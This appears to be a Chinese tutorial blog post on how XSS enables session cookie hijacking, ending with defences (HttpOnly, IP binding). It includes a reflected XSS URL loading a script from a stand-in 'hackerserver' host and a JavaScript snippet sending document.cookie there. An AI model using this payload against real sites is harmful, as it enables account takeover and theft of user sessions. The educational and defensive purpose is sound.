网站首页 > 基础教程 正文
一旦网站存在XSS漏洞,最大的受害者不是网站管理方,而是众多的的网站用户。黑客利用XSS漏洞,劫持Cookie 之后,可以直接登录用户的管理中心,根本不需要密码,手机验证码神马的。
有人就会问了:So,进入管理中心有又什么用呢?
进入管理中心就可以操作修改用户的个人信息,可以说是为所欲为。
有人就又问了:改就改吧,只要不改密码,随便改。
是的,现在大部分的网站,在用户修改密码时,需要用户输入原始密码,因此通过Cookie劫持,无法修改密码,但是如果黑客在你的管理中心,删博客,发帖,发表不当言论,你是不是就紧张?轻则丢失数据,重则被请去喝茶,是不是开始害怕了?
好了,下边我就开始了解一下,利用XSS,完成Cookie劫持的流程。
第一步:
首先,我们利用的XSS漏洞,加载一个远程的JS文件。
http://localhost:82/xxs-case1.php?param=<script src=http://www.hackerserver.com/xss.js><script>
第二步:
在xss.js里面,获取当前用户在当前网站的Cookie,并发送到恶意服务器。代码如下:
var img=document.createElement("img");
img.src="http://www.hackerserver.com/cookielog?"+escape(document.cookie);
document.body.appendChild(img);
第三步:
因为,当前的Web应用中,大部分的都是用Cookie来保存用户的登录凭证的,因此可以利用劫持到的的Cookie,不需要密码登录 ,访问用户的管理中心。
总结
有人问了,Cookie劫持这么危险,有没有有效的防御措施,答案是肯定的。
(1)设置HttpOnly 标识。给Cookie加上HttpOnly标识之后,恶意JS脚本就无法访问到浏览器里面存储的Cookie信息,从而有效的降低了Cookie被劫持的可能性。
(2)绑定客户端IP。后台把用户的Cookie和用户登录时的客户端IP绑定在一起,如此一来,就算Cookie被劫持,黑客也无法利用劫持到的Cookie登录用户管理中心。
- 上一篇: Cookies和Session的区别和理解
- 下一篇: 浅谈JavaScript的用处
猜你喜欢
- 2024-11-26 工作中,前端开发要看项目,怎么查看别人的js项目代码
- 2024-11-26 Cookie 在爬虫中的应用
- 2024-11-26 55个JS代码让你轻松当大神
- 2024-11-26 操作cookie
- 2024-11-26 9个原生js库助力前端开发,你都用过吗?
- 2024-11-26 Selenium4+Python3系列(七) Iframe、常见控件、JS、Cookie操作
- 2024-11-26 浅谈JavaScript的用处
- 2024-11-26 Cookies和Session的区别和理解
- 2024-11-26 cookie是什么?有什么用?cookie详解,一篇文章彻底搞懂cookie
- 2024-11-26 python+selenium文件上传,Cookie操作,调用 JS,窗口截图
- 最近发表
- 标签列表
-
- gitpush (61)
- pythonif (68)
- location.href (57)
- tail-f (57)
- pythonifelse (59)
- deletesql (62)
- c++模板 (62)
- css3动画 (57)
- c#event (59)
- linuxgzip (68)
- 字符串连接 (73)
- nginx配置文件详解 (61)
- html标签 (69)
- c++初始化列表 (64)
- exec命令 (59)
- canvasfilltext (58)
- mysqlinnodbmyisam区别 (63)
- arraylistadd (66)
- node教程 (59)
- console.table (62)
- c++time_t (58)
- phpcookie (58)
- mysqldatesub函数 (63)
- window10java环境变量设置 (66)
- c++虚函数和纯虚函数的区别 (66)